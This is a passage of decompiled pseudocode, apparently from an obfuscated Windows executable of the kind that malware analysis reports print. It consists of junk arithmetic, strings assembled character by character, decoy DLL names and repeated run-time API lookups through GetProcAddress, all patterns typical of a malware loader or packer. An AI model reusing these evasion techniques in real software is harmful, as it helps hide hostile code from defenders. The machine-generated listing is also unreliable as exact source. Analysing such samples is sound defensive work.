      						_t2201 =  *0x8a9b3c; // 0x4d52f553
      						 *0x8a9b3c = E00407278(_t2201);
      						_t2203 =  *0x8a9b84; // 0xfcfc377e
      						 *0x8a9b70 = _t2203;
      						_t2204 =  *0x8a9b3c; // 0x4d52f553
      						__eflags = _t2204 -  *0x8a9b70; // 0x20ba273a
      						if(__eflags > 0) {
      							_t2205 =  *0x8a9a58; // 0x4192234
      							_v424 = _t2205 + 4;
      							asm("fild dword [ebp-0x1a4]");
      							 *0x8a9b00 = E004076F4();
      							_t2208 =  *0x8a9ad4; // 0xba811226
      							 *0x8a9bc0 = _t2208 + 0xe9;
      							_t2210 =  *0x8a9abc; // 0x11dcea12
      							_v424 = _t2210 + 4;
      							asm("fild dword [ebp-0x1a4]");
      							 *0x8a9ac8 = E004076F4();
      							_t2213 =  *0x8a9ae8; // 0x5
      							 *0x8a9b98 = _t2213 - 0x79;
      							_t2215 =  *0x8a9a8c; // 0x7acda9e0
      							 *0x8a9ab4 = _t2215 + 4;
      							_t2217 =  *0x8a9abc; // 0x11dcea12
      							 *0x8a9b80 = _t2217 +  *0x8a9ba8;
      						}
      					}
      					_t2009 =  *0x8a9a68; // 0x3662937a
      					 *0x8a9aa4 = _t2009;
      					_t2010 =  *0x8a9afc; // 0x0
      					E0040ACB4(_t2010, L"IMEPADSM.DLL");
      					if(__eflags != 0) {
      						_t2012 =  *0x8a9b60; // 0x1846cbe
      						 *0x8a9a58 = _t2012 - 0x42;
      						_t2014 =  *0x8a9bb0; // 0x0
      						 *0x8a9b40 = _t2014;
      						_t2015 =  *0x8a9b40; // 0x5322b944
      						__eflags = _t2015 -  *0x8a9aa4; // 0x58cb7cf7
      						if(__eflags < 0) {
      							_t2156 =  *0x8a9a84; // 0x87862ac7
      							 *0x8a9ac0 = _t2156;
      							_t2157 =  *0x8a9b78; // 0x12d6c
      							 *0x8a9b6c = _t2157;
      							_t2158 =  *0x8a9aa0; // 0x36c714ef
      							 *0x8a9a40 = _t2158 -  *0x8a9b48;
      							_t2160 =  *0x8a9b90; // 0x50bf15f2
      							 *0x8a9b4c = _t2160 + 0x79;
      							_t2162 =  *0x8a9b44; // 0x892c9cf8
      							_t2163 = _t2162 *  *0x8a9ba8;
      							__eflags = _t2163;
      							 *0x8a9a54 = _t2163;
      							asm("fild dword [0x8a9b2c]");
      							 *0x8a9b44 = E004076F4();
      						}
      					} else {
      						E0040ACEC(_v12, 0, 1,  &_v12);
      						_t2168 =  *0x8a9a70; // 0x60792d03
      						 *0x8a9a40 = _t2168 + 0xf;
      					}
      					_t2016 =  &_v412;
      					_t4326 =  *0x8aa104; // 0x8b0919
      					 *((char*)(_t2016 + 1)) =  *_t4326;
      					 *_t2016 = 1;
      					E0040A324( &_v416,  &_v412);
      					_t2019 =  &_v420;
      					_t4329 =  *0x8a9fd0; // 0x8b0917
      					 *((char*)(_t2019 + 1)) =  *_t4329;
      					 *_t2019 = 1;
      					E0040A34C( &_v416, 2,  &_v420);
      					E0040A324( &_v424,  &_v416);
      					_t2024 =  &_v420;
      					_t4333 =  *0x8aa15c; // 0x8b091c
      					 *((char*)(_t2024 + 1)) =  *_t4333;
      					 *_t2024 = 1;
      					E0040A34C( &_v424, 3,  &_v420);
      					E0040A324( &_v432,  &_v424);
      					E0040A34C( &_v432, 4, 0x86f3d4);
      					E0040A324( &_v440,  &_v432);
      					_t2033 =  &_v420;
      					_t4339 =  *0x8aa15c; // 0x8b091c
      					 *((char*)(_t2033 + 1)) =  *_t4339;
      					 *_t2033 = 1;
      					E0040A34C( &_v440, 5,  &_v420);
      					E0040A324( &_v448,  &_v440);
      					_t2038 =  &_v420;
      					_t4343 =  *0x8a9f14; // 0x8b0922
      					 *((char*)(_t2038 + 1)) =  *_t4343;
      					 *_t2038 = 1;
      					E0040A34C( &_v448, 6,  &_v420);
      					E0040A324( &_v456,  &_v448);
      					_t2043 =  &_v420;
      					_t4347 =  *0x8a9f14; // 0x8b0922
      					 *((char*)(_t2043 + 1)) =  *_t4347;
      					 *_t2043 = 1;
      					E0040A34C( &_v456, 7,  &_v420);
      					E0040AA98( &_v456);
      					_t2048 =  *0x8a9b38; // 0xfcbf7485
      					__eflags = _t2048 + 0xf1 -  *0x8a9abc; // 0x11dcea12
      					if(__eflags < 0) {
      						_t2155 =  *0x8a9a8c * 0xd0;
      						__eflags = _t2155;
      						 *0x8a9a3c = _t2155;
      					}
      					__eflags = 0;
      					_pop(_t4351);
      					 *[fs:eax] = _t4351;
      					_push(E0086F3CD);
      					E00409D28( &_v5408, 0x16);
      					E00409C98( &_v5320);
      					E00409D28( &_v5316, 0x4c);
      					E00409CBC( &_v4984);
      					E00409D28( &_v5012, 7);
      					E00409D28( &_v4980, 0x14);
      					E00409CF8( &_v4900, 0xb);
      					E00409CE0( &_v4856);
      					E00409D28( &_v4852, 0x38);
      					E00409D28( &_v4624, 5);
      					E00409CBC( &_v4628);
      					E00409D28( &_v4604, 0x62);
      					E00409CE0( &_v4176);
      					E00409CF8( &_v4212, 9);
      					E00409D28( &_v4172, 0x52);
      					E00409D28( &_v3828, 9);
      					E00409D28( &_v3844, 4);
      					E00409D28( &_v3792, 0x51);
      					E00409D28( &_v3456, 0xf);
      					E00409D28( &_v3468, 3);
      					E00409D28( &_v3396, 0x5a);
      					E00409D28( &_v3016, 7);
      					E00409D28( &_v3036, 5);
      					E00409D28( &_v2988, 0x57);
      					E00409D28( &_v2612, 8);
      					E00409D28( &_v2640, 7);
      					E00409CF8( &_v2580, 0xc);
      					E00409CE0( &_v2532);
      					E00409D28( &_v2528, 0x4f);
      					E00409CBC( &_v2100);
      					E00409D28( &_v2212, 0x1c);
      					E00409D28( &_v2096, 0x46);
      					E00409D28( &_v1740, 2);
      					E00409D28( &_v1816, 0x13);
      					E00409D28( &_v1732, 0x46);
      					E00409D28( &_v1116, 2);
      					E00409D28( &_v1080, 9);
      					E00409D28( &_v1108, 7);
      					E00409D28( &_v1044, 0x54);
      					E00409D28( &_v660, 9);
      					E00409D28( &_v708, 0xc);
      					E00409CF8( &_v624, 0xc);
      					E00409CE0( &_v576);
      					E00409D28( &_v572, 0xd);
      					E00409CBC( &_v376);
      					E00409CBC( &_v368);
      					E00409CBC( &_v344);
      					E00409CBC( &_v328);
      					E00409CBC( &_v204);
      					E00409CBC( &_v168);
      					E00409CBC( &_v148);
      					return E00409CF8( &_v20, 3);
      				} else {
      					asm("fild dword [ebp-0x24]");
      					_v56 = E004076E8();
      					_v44 = _v64 * 0x8a;
      					if(_v60 - _v28 == _v60) {
      						E0040A0C0( &_v12, L"wow32.dll");
      					}
      					_v72 = _v24 + _v76;
      					_v36 = 0;
      					if(_v36 < 0xc) {
      						_v36 = _v36 + 1;
      						if(_v44 - _v40 == _v60) {
      							E0040A0C0( &_v20, _v12);
      							E0040A0C0( &_v12, _v20);
      							E0040A0C0( &_v16, _v12);
      							E0040ACEC(_v20, 2, 1,  &_v16);
      							E0040A0C0( &_v12, _v20);
      							E0040A0C0( &_v12, _v12);
      						}
      					}
      					E0040A0C0( &_v12, _v20);
      					_t2252 =  *0x8a9f40; // 0x8b0925
      					_v85 =  *_t2252;
      					if(_v85 + 0x9f - 0x1a < 0) {
      						_v85 = _v85 - 0x20;
      					}
      					_t2257 =  *0x8a9ffc; // 0x8b091a
      					_v86 =  *_t2257;
      					if(_v86 + 0x9f - 0x1a < 0) {
      						_v86 = _v86 - 0x20;
      					}
      					_t2262 =  *0x8a9f40; // 0x8b0925
      					_v87 =  *_t2262;
      					if(_v87 + 0x9f - 0x1a < 0) {
      						_v87 = _v87 - 0x20;
      					}
      					_t2267 =  *0x8a9ffc; // 0x8b091a
      					_v88 =  *_t2267;
      					if(_v88 + 0x9f - 0x1a < 0) {
      						_v88 = _v88 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v632);
      					E0040A3C0(0);
      					_push(_v636);
      					E0040A3C0(0);
      					_push(_v640);
      					E0040A3C0(0);
      					_push(_v644);
      					E0040A3C0(0);
      					_push(_v648);
      					E0040A3C0(0);
      					_push(_v652);
      					E0040A3C0(0);
      					_push(_v656);
      					E0040A3C0(0);
      					_push(_v660);
      					E0040A3C0(0);
      					_push(_v664);
      					E0040A3C0(0);
      					_push(_v668);
      					E0040A3C0(0);
      					_push(_v672);
      					E0040A3C0(0);
      					_push(_v676);
      					E0040A3C0(0);
      					_push(_v680);
      					E0040A3C0(0);
      					_push(_v684);
      					E0040A3C0(0);
      					_push(_v688);
      					E0040A3C0(0);
      					_push(_v692);
      					E0040A3C0(0);
      					_push(_v696);
      					E0040A3C0(0);
      					_push(_v700);
      					E0040A3C0(0);
      					_push(_v704);
      					E0040A3C0(0);
      					_push(_v708);
      					E0040A494( &_v628, _t3910, 0x14, _t5187, _t5188);
      					 *0x8b11d8 = GetProcAddress(_v8, E0040A594(_v628));
      					E0040A0C0( &_v12, _v20);
      					E0040A0C0( &_v12, L"EP0NS411.DLL");
      					_v68 = 0;
      					do {
      						if(_v56 - _v32 > _v68 - _v32) {
      							_v64 = _v40;
      							asm("fild dword [ebp-0x38]");
      							_v72 = E004076F4();
      							_v28 = _v76;
      							_v424 = _v56 + 0xee;
      							asm("fild dword [ebp-0x1a4]");
      							_v32 = E004076E8();
      							E0040A0C0( &_v16, _v12);
      							E0040A0C0( &_v20, _v20);
      						}
      						E0040A0C0( &_v12, _v12);
      						_v68 = _v68 + 1;
      					} while (_v68 != 5);
      					E0040ACEC(_v12, 0, 1,  &_v12);
      					E0040A0C0( &_v12, _v20);
      					E0040A0C0( &_v12, _v12);
      					_t2334 =  *0x8a9f40; // 0x8b0925
      					_v89 =  *_t2334;
      					if(_v89 + 0x9f - 0x1a < 0) {
      						_v89 = _v89 - 0x20;
      					}
      					_t2339 =  *0x8a9d58; // 0x8b0913
      					_v90 =  *_t2339;
      					if(_v90 + 0x9f - 0x1a < 0) {
      						_v90 = _v90 - 0x20;
      					}
      					_t2344 =  *0x8a9f40; // 0x8b0925
      					_v91 =  *_t2344;
      					if(_v91 + 0x9f - 0x1a < 0) {
      						_v91 = _v91 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v716);
      					E0040A3C0(0);
      					_push(_v720);
      					E0040A3C0(0);
      					_push(_v724);
      					E0040A3C0(0);
      					_push(_v728);
      					E0040A3C0(0);
      					_push(_v732);
      					E0040A3C0(0);
      					_push(_v736);
      					E0040A3C0(0);
      					_push(_v740);
      					E0040A3C0(0);
      					_push(_v744);
      					E0040A3C0(0);
      					_push(_v748);
      					E0040A3C0(0);
      					_push(_v752);
      					E0040A3C0(0);
      					_push(_v756);
      					E0040A3C0(0);
      					_push(_v760);
      					E0040A3C0(0);
      					_push(_v764);
      					E0040A3C0(0);
      					_push(_v768);
      					E0040A3C0(0);
      					_push(_v772);
      					E0040A3C0(0);
      					_push(_v776);
      					E0040A3C0(0);
      					_push(_v780);
      					E0040A3C0(0);
      					_push(_v784);
      					E0040A3C0(0);
      					_push(_v788);
      					E0040A494( &_v712, _t3910, 0x13, _t5187, _t5188);
      					 *0x8b11dc = GetProcAddress(_v8, E0040A594(_v712));
      					_v68 = 0;
      					do {
      						_t2394 =  *0x8a9ce4; // 0x8b0912
      						_v92 =  *_t2394;
      						if(_v92 + 0x9f - 0x1a < 0) {
      							_v92 = _v92 - 0x20;
      						}
      						_t2399 =  *0x8a9f14; // 0x8b0922
      						_v93 =  *_t2399;
      						if(_v93 + 0x9f - 0x1a < 0) {
      							_v93 = _v93 - 0x20;
      						}
      						_t2404 =  *0x8a9fbc; // 0x8b0929
      						_v94 =  *_t2404;
      						if(_v94 + 0x9f - 0x1a < 0) {
      							_v94 = _v94 - 0x20;
      						}
      						E0040A3C0(0);
      						_push(_v796);
      						E0040A3C0(0);
      						_push(_v800);
      						E0040A3C0(0);
      						_push(_v804);
      						E0040A3C0(0);
      						_push(_v808);
      						E0040A3C0(0);
      						_push(_v812);
      						E0040A3C0(0);
      						_push(_v816);
      						E0040A3C0(0);
      						_push(_v820);
      						E0040A3C0(0);
      						_push(_v824);
      						E0040A3C0(0);
      						_push(_v828);
      						E0040A3C0(0);
      						_push(_v832);
      						E0040A3C0(0);
      						_push(_v836);
      						E0040A3C0(0);
      						_push(_v840);
      						E0040A3C0(0);
      						_push(_v844);
      						E0040A3C0(0);
      						_push(_v848);
      						E0040A3C0(0);
      						_push(_v852);
      						E0040A3C0(0);
      						_push(_v856);
      						_push(0x86f534);
      						E0040A3C0(0);
      						_push(_v860);
      						E0040A3C0(0);
      						_push(_v864);
      						E0040A3C0(0);
      						E0040A494( &_v792, _t3910, 0x14, _t5187, _t5188);
      						E0040A9E8( &_v12, _v792, _v868);
      						_v68 = _v68 + 1;
      					} while (_v68 != 3);
      					_t2451 =  *0x8a9ba4; // 0xfcfc3737
      					 *0x8a9ba4 = E00407278(_t2451);
      					_t2453 =  *0x8a9a34; // 0xe22aa3e4
      					 *0x8a9a34 = E00407278(_t2453);
      					_t2455 =  *0x8a9a34; // 0xe22aa3e4
      					_t5247 = _t2455 -  *0x8a9ba4; // 0xfcfc3737
      					if(_t5247 <= 0) {
      						_t2456 =  *0x8a9bbc; // 0x6009aad7
      						 *0x8a9b98 = _t2456;
      						_t2457 =  *0x8a9a34; // 0xe22aa3e4
      						__eflags = _t2457 -  *0x8a9b98; // 0xbc98d55c
      						if(__eflags <= 0) {
      							_t2458 =  *0x8a9ab4; // 0x967faa
      							 *0x8a9b6c = _t2458 *  *0x8a9a3c;
      							_t2460 =  *0x8a9a54; // 0xedbf3eae
      							 *0x8a9a84 = _t2460 +  *0x8a9b00;
      							_t2462 =  *0x8a9b50; // 0x36c714d5
      							 *0x8a9b3c = _t2462 +  *0x8a9a98;
      							 *0x8a9a44 =  *0x8a9ab8 * 0x85;
      							 *0x8a9ad8 =  *0x8a9b34 * 0x82;
      							_t2466 =  *0x8a9b60; // 0x1846cbe
      							_t2467 = _t2466 + 4;
      							__eflags = _t2467;
      							_v424 = _t2467;
      							asm("fild dword [ebp-0x1a4]");
      							 *0x8a9b5c = E004076F4();
      						} else {
      							_v44 = _v72 * 0x52;
      							_v52 = _v48 + _v76;
      							_t3691 =  *0x8a9b50; // 0x36c714d5
      							 *0x8a9b90 = _t3691 *  *0x8a9a88;
      							_t3693 =  *0x8a9b40; // 0x5322b944
      							 *0x8a9a94 = _t3693 - 0xa2;
      							_t3695 =  *0x8a9b30; // 0x60792cb9
      							_v424 = _t3695 + 0x6b;
      							asm("fild dword [ebp-0x1a4]");
      							 *0x8a9b38 = E004076E8();
      							 *0x8a9bbc = 0xce -  *0x8a9b5c;
      						}
      						_t2469 =  *0x8a9ab4; // 0x967faa
      						 *0x8a9a34 = _t2469;
      						__eflags = 0x51;
      						 *0x8a9a54 = 0x51 -  *0x8a9a44;
      					} else {
      						_v56 = _v28 * 0xbe;
      					}
      					 *0x8a9aec = 0;
      					E0085E4BC();
      					 *0x8a9a68 =  *0x8a9a54 * 0xc1;
      					_t2475 =  *0x8a9b84; // 0xfcfc377e
      					 *0x8a9a88 = _t2475 + _t2475 + (_t2475 + _t2475) * 8;
      					if(_v56 + _v60 <= _v60) {
      						__eflags = _v56 - _v40;
      						if(_v56 > _v40) {
      							_t3675 =  *0x8a9a98; // 0xb163bd55
      							 *0x8a9b78 = _t3675 -  *0x8a9b24;
      							_t3677 =  *0x8a9a8c; // 0x7acda9e0
      							 *0x8a9a84 = _t3677 + 0xb6;
      							_t3679 =  *0x8a9a74; // 0xedbf3fa1
      							 *0x8a9b28 = _t3679 +  *0x8a9b64;
      							_t3681 =  *0x8a9b34; // 0xedbf3fa1
      							 *0x8a9a3c = _t3681 -  *0x8a9b94;
      							_t3683 =  *0x8a9b98; // 0xbc98d55c
      							 *0x8a9b1c = _t3683 - 0xdb;
      							_t3685 =  *0x8a9a34 * 0x3e;
      							__eflags = _t3685;
      							 *0x8a9b94 = _t3685;
      						}
      					} else {
      						 *0x8a9b28 = 0;
      						E0085E4BC();
      					}
      					_t2481 =  *0x8a9f40; // 0x8b0925
      					_v95 =  *_t2481;
      					if(_v95 + 0x9f - 0x1a < 0) {
      						_v95 = _v95 - 0x20;
      					}
      					_t2486 =  *0x8aa15c; // 0x8b091c
      					_v96 =  *_t2486;
      					if(_v96 + 0x9f - 0x1a < 0) {
      						_v96 = _v96 - 0x20;
      					}
      					_t2491 =  *0x8aa1dc; // 0x8b0921
      					_v97 =  *_t2491;
      					if(_v97 + 0x9f - 0x1a < 0) {
      						_v97 = _v97 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v876);
      					E0040A3C0(0);
      					_push(_v880);
      					E0040A3C0(0);
      					_push(_v884);
      					E0040A3C0(0);
      					_push(_v888);
      					E0040A3C0(0);
      					_push(_v892);
      					E0040A3C0(0);
      					_push(_v896);
      					E0040A3C0(0);
      					_push(_v900);
      					E0040A3C0(0);
      					_push(_v904);
      					E0040A3C0(0);
      					_push(_v908);
      					E0040A3C0(0);
      					_push(_v912);
      					E0040A3C0(0);
      					_push(_v916);
      					E0040A3C0(0);
      					_push(_v920);
      					E0040A3C0(0);
      					_push(_v924);
      					E0040A3C0(0);
      					_push(_v928);
      					E0040A3C0(0);
      					_push(_v932);
      					E0040A494( &_v872, _t3910, 0xf, _t5187, _t5188);
      					 *0x8b11e0 = GetProcAddress(_v8, E0040A594(_v872));
      					_v44 = 0xc1 - _v76;
      					_v68 = 0;
      					while(_v68 < 0) {
      						_v68 = _v68 + 1;
      						_v48 = _v60 + 0x37;
      						_v36 = 0;
      						do {
      							_v28 = _v40 - 0xed;
      							_t3660 =  *0x8a9b00; // 0xf8c6059a
      							_v424 = _t3660 + 4;
      							asm("fild dword [ebp-0x1a4]");
      							 *0x8a9ac8 = E004076F4();
      							_t3663 =  *0x8a9ba4; // 0xfcfc3737
      							_v424 = _t3663 + 0x1f;
      							asm("fild dword [ebp-0x1a4]");
      							 *0x8a9b7c = E004076E8();
      							_t3666 =  *0x8a9a8c; // 0x7acda9e0
      							 *0x8a9a6c = _t3666 + 0x1c;
      							_t3668 =  *0x8a99e4; // 0x7c5162fc
      							 *0x8a9b20 = _t3668 *  *0x8a9ac8;
      							_t3670 =  *0x8a9b38; // 0xfcbf7485
      							 *0x8a99e0 = _t3670 -  *0x8a9a6c;
      							_v36 = _v36 + 1;
      						} while (_v36 != 0xe);
      						_t3672 =  *0x8a9a6c; // 0xfbe7a61a
      						 *0x8a9b44 = _t3672 -  *0x8a9a74;
      						_t3674 =  *0x8a9ba4; // 0xfcfc3737
      						 *0x8a9b1c = _t3674;
      					}
      					E0040A0C0( &_v12, _v16);
      					E0040A0C0( &_v12, _v20);
      					_t2539 =  *0x8a9b70; // 0x20ba273a
      					 *0x8a9ad8 = _t2539 - 0x9d;
      					E0040A0C0( &_v12, L"NlsLexicons001a.dll");
      					_t2543 =  *0x8a9f40; // 0x8b0925
      					_v98 =  *_t2543;
      					if(_v98 + 0x9f - 0x1a < 0) {
      						_v98 = _v98 - 0x20;
      					}
      					_t2548 =  *0x8a9fd0; // 0x8b0917
      					_v99 =  *_t2548;
      					if(_v99 + 0x9f - 0x1a < 0) {
      						_v99 = _v99 - 0x20;
      					}
      					_t2553 =  *0x8aa1dc; // 0x8b0921
      					_v100 =  *_t2553;
      					if(_v100 + 0x9f - 0x1a < 0) {
      						_v100 = _v100 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v940);
      					E0040A3C0(0);
      					_push(_v944);
      					E0040A3C0(0);
      					_push(_v948);
      					E0040A3C0(0);
      					_push(_v952);
      					E0040A3C0(0);
      					_push(_v956);
      					E0040A3C0(0);
      					_push(_v960);
      					E0040A3C0(0);
      					_push(_v964);
      					E0040A3C0(0);
      					_push(_v968);
      					E0040A3C0(0);
      					_push(_v972);
      					E0040A3C0(0);
      					_push(_v976);
      					E0040A3C0(0);
      					_push(_v980);
      					E0040A3C0(0);
      					_push(_v984);
      					E0040A3C0(0);
      					_push(_v988);
      					E0040A3C0(0);
      					_push(_v992);
      					E0040A494( &_v936, _t3910, 0xe, _t5187, _t5188);
      					 *0x8b11e4 = GetProcAddress(_v8, E0040A594(_v936));
      					_t2592 =  *0x8a9f40; // 0x8b0925
      					_v101 =  *_t2592;
      					if(_v101 + 0x9f - 0x1a < 0) {
      						_v101 = _v101 - 0x20;
      					}
      					_t2597 =  *0x8aa15c; // 0x8b091c
      					_v102 =  *_t2597;
      					if(_v102 + 0x9f - 0x1a < 0) {
      						_v102 = _v102 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v1000);
      					E0040A3C0(0);
      					_push(_v1004);
      					E0040A3C0(0);
      					_push(_v1008);
      					E0040A3C0(0);
      					_push(_v1012);
      					E0040A3C0(0);
      					_push(_v1016);
      					E0040A3C0(0);
      					_push(_v1020);
      					E0040A3C0(0);
      					_push(_v1024);
      					E0040A3C0(0);
      					_push(_v1028);
      					E0040A3C0(0);
      					_push(_v1032);
      					E0040A3C0(0);
      					_push(_v1036);
      					E0040A3C0(0);
      					_push(_v1040);
      					E0040A3C0(0);
      					_push(_v1044);
      					E0040A494( &_v996, _t3910, 0xc, _t5187, _t5188);
      					 *0x8b11e8 = GetProcAddress(_v8, E0040A594(_v996));
      					_t2632 =  *0x8a9f40; // 0x8b0925
      					_v103 =  *_t2632;
      					if(_v103 + 0x9f - 0x1a < 0) {
      						_v103 = _v103 - 0x20;
      					}
      					_t2637 =  *0x8a9f40; // 0x8b0925
      					_v104 =  *_t2637;
      					if(_v104 + 0x9f - 0x1a < 0) {
      						_v104 = _v104 - 0x20;
      					}
      					_t2642 =  *0x8aa0b4; // 0x8b091f
      					_v105 =  *_t2642;
      					if(_v105 + 0x9f - 0x1a < 0) {
      						_v105 = _v105 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v1052);
      					E0040A3C0(0);
      					_push(_v1056);
      					E0040A3C0(0);
      					_push(_v1060);
      					E0040A3C0(0);
      					_push(_v1064);
      					E0040A3C0(0);
      					_push(_v1068);
      					E0040A3C0(0);
      					_push(_v1072);
      					E0040A3C0(0);
      					_push(_v1076);
      					E0040A3C0(0);
      					_push(_v1080);
      					E0040A3C0(0);
      					_push(_v1084);
      					E0040A3C0(0);
      					_push(_v1088);
      					E0040A3C0(0);
      					_push(_v1092);
      					E0040A3C0(0);
      					_push(_v1096);
      					E0040A3C0(0);
      					_push(_v1100);
      					E0040A3C0(0);
      					_push(_v1104);
      					E0040A3C0(0);
      					_push(_v1108);
      					E0040A494( &_v1048, _t3910, 0xf, _t5187, _t5188);
      					 *0x8b124c = GetProcAddress(_v8, E0040A594(_v1048));
      					_v52 = _v60 + 0x68;
      					E0040A0C0( &_v12, _v16);
      					_t2687 =  *0x8a99d4; // 0x0
      					_v112 = _t2687;
      					if(_v112 != 0) {
      						_v112 =  *((intOrPtr*)(_v112 - 4));
      					}
      					if(_v112 == 0xea) {
      						if(0x78 - _v60 < 0x20) {
      							_v68 = _v56 + 0xea;
      							asm("fild dword [ebp-0x14]");
      							_v76 = E004076E8();
      							E0040ACEC(_v12, 0, 1,  &_v12);
      							_v44 = _v64 + 0x9a;
      							E0040A0C0( &_v16, _v12);
      							E0040ACEC(_v12, 0, 1,  &_v12);
      						}
      						_t5280 = _v64 + 0x25 - _v72;
      						if(_v64 + 0x25 >= _v72) {
      							__eflags = 0;
      							E0040ACEC(_v12, 0, 1,  &_v16);
      							_t3420 =  &_v412;
      							_t4908 =  *0x8a9f40; // 0x8b0925
      							 *((char*)(_t3420 + 1)) =  *_t4908;
      							 *_t3420 = 1;
      							E0040A324( &_v416,  &_v412);
      							_t3423 =  &_v420;
      							_t4911 =  *0x8a9ffc; // 0x8b091a
      							 *((char*)(_t3423 + 1)) =  *_t4911;
      							 *_t3423 = 1;
      							E0040A34C( &_v416, 2,  &_v420);
      							E0040A324( &_v424,  &_v416);
      							_t3428 =  &_v420;
      							_t4915 =  *0x8a9f40; // 0x8b0925
      							 *((char*)(_t3428 + 1)) =  *_t4915;
      							 *_t3428 = 1;
      							E0040A34C( &_v424, 3,  &_v420);
      							E0040A324( &_v432,  &_v424);
      							_t3433 =  &_v420;
      							_t4919 =  *0x8aa0b4; // 0x8b091f
      							 *((char*)(_t3433 + 1)) =  *_t4919;
      							 *_t3433 = 1;
      							E0040A34C( &_v432, 4,  &_v420);
      							E0040A324( &_v440,  &_v432);
      							_t3438 =  &_v420;
      							_t4923 =  *0x8a9e00; // 0x8b091d
      							 *((char*)(_t3438 + 1)) =  *_t4923;
      							 *_t3438 = 1;
      							E0040A34C( &_v440, 5,  &_v420);
      							E0040A324( &_v448,  &_v440);
      							_t3443 =  &_v420;
      							_t4927 =  *0x8a9fd0; // 0x8b0917
      							 *((char*)(_t3443 + 1)) =  *_t4927;
      							 *_t3443 = 1;
      							E0040A34C( &_v448, 6,  &_v420);
      							E0040A324( &_v456,  &_v448);
      							_t3448 =  &_v420;
      							_t4931 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3448 + 1)) =  *_t4931;
      							 *_t3448 = 1;
      							E0040A34C( &_v456, 7,  &_v420);
      							E0040A324( &_v468,  &_v456);
      							_t3453 =  &_v420;
      							_t4935 =  *0x8a9ce4; // 0x8b0912
      							 *((char*)(_t3453 + 1)) =  *_t4935;
      							 *_t3453 = 1;
      							E0040A34C( &_v468, 8,  &_v420);
      							E0040A324( &_v480,  &_v468);
      							E0040A34C( &_v480, 9, 0x86f3d4);
      							E0040A324( &_v492,  &_v480);
      							_t3462 =  &_v420;
      							_t4941 =  *0x8aa15c; // 0x8b091c
      							 *((char*)(_t3462 + 1)) =  *_t4941;
      							 *_t3462 = 1;
      							E0040A34C( &_v492, 0xa,  &_v420);
      							E0040A324( &_v504,  &_v492);
      							_t3467 =  &_v420;
      							_t4945 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3467 + 1)) =  *_t4945;
      							 *_t3467 = 1;
      							E0040A34C( &_v504, 0xb,  &_v420);
      							E0040A324( &_v520,  &_v504);
      							_t3472 =  &_v420;
      							_t4949 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3472 + 1)) =  *_t4949;
      							 *_t3472 = 1;
      							E0040A34C( &_v520, 0xc,  &_v420);
      							E0040AA98( &_v520);
      							E0040A0C0( &_v12, _v16);
      							E0040A0C0( &_v16, L"f3ahvoas.dll");
      							E0040A0C0( &_v20, _v16);
      							E0040A0C0( &_v20, _v20);
      						} else {
      							E0040A0C0( &_v20, _v12);
      							E0040A0C0( &_v12, L"secur32.dll");
      							E0040A0C0( &_v12, _v12);
      							E0040A0C0( &_v16, _v20);
      							_t3493 =  &_v412;
      							_t4961 =  *0x8a9ffc; // 0x8b091a
      							 *((char*)(_t3493 + 1)) =  *_t4961;
      							 *_t3493 = 1;
      							E0040A324( &_v416,  &_v412);
      							_t3496 =  &_v420;
      							_t4964 =  *0x8aa104; // 0x8b0919
      							 *((char*)(_t3496 + 1)) =  *_t4964;
      							 *_t3496 = 1;
      							E0040A34C( &_v416, 2,  &_v420);
      							E0040A324( &_v424,  &_v416);
      							_t3501 =  &_v420;
      							_t4968 =  *0x8a9fd0; // 0x8b0917
      							 *((char*)(_t3501 + 1)) =  *_t4968;
      							 *_t3501 = 1;
      							E0040A34C( &_v424, 3,  &_v420);
      							E0040A324( &_v432,  &_v424);
      							E0040A34C( &_v432, 4, 0x86f590);
      							E0040A324( &_v440,  &_v432);
      							_t3510 =  &_v420;
      							_t4974 =  *0x8a9fbc; // 0x8b0929
      							 *((char*)(_t3510 + 1)) =  *_t4974;
      							 *_t3510 = 1;
      							E0040A34C( &_v440, 5,  &_v420);
      							E0040A324( &_v448,  &_v440);
      							_t3515 =  &_v420;
      							_t4978 =  *0x8aa288; // 0x8b091b
      							 *((char*)(_t3515 + 1)) =  *_t4978;
      							 *_t3515 = 1;
      							E0040A34C( &_v448, 6,  &_v420);
      							E0040A324( &_v456,  &_v448);
      							E0040A34C( &_v456, 7, 0x86f590);
      							E0040A324( &_v468,  &_v456);
      							_t3524 =  &_v420;
      							_t4984 =  *0x8a9cf4; // 0x8b0911
      							 *((char*)(_t3524 + 1)) =  *_t4984;
      							 *_t3524 = 1;
      							E0040A34C( &_v468, 8,  &_v420);
      							E0040A324( &_v480,  &_v468);
      							_t3529 =  &_v420;
      							_t4988 =  *0x8a9fd0; // 0x8b0917
      							 *((char*)(_t3529 + 1)) =  *_t4988;
      							 *_t3529 = 1;
      							E0040A34C( &_v480, 9,  &_v420);
      							E0040A324( &_v492,  &_v480);
      							_t3534 =  &_v420;
      							_t4992 =  *0x8aa0b8; // 0x8b0928
      							 *((char*)(_t3534 + 1)) =  *_t4992;
      							 *_t3534 = 1;
      							E0040A34C( &_v492, 0xa,  &_v420);
      							E0040A324( &_v504,  &_v492);
      							E0040A34C( &_v504, 0xb, 0x86f590);
      							E0040A324( &_v520,  &_v504);
      							_t3543 =  &_v420;
      							_t4998 =  *0x8a9f40; // 0x8b0925
      							 *((char*)(_t3543 + 1)) =  *_t4998;
      							 *_t3543 = 1;
      							E0040A34C( &_v520, 0xc,  &_v420);
      							E0040A324( &_v1132,  &_v520);
      							_t3548 =  &_v420;
      							_t5002 =  *0x8a9c3c; // 0x8b0918
      							 *((char*)(_t3548 + 1)) =  *_t5002;
      							 *_t3548 = 1;
      							E0040A34C( &_v1132, 0xd,  &_v420);
      							E0040A324( &_v1148,  &_v1132);
      							_t3553 =  &_v420;
      							_t5006 =  *0x8a9d58; // 0x8b0913
      							 *((char*)(_t3553 + 1)) =  *_t5006;
      							 *_t3553 = 1;
      							E0040A34C( &_v1148, 0xe,  &_v420);
      							E0040A324( &_v1164,  &_v1148);
      							_t3558 =  &_v420;
      							_t5010 =  *0x8a9ce4; // 0x8b0912
      							 *((char*)(_t3558 + 1)) =  *_t5010;
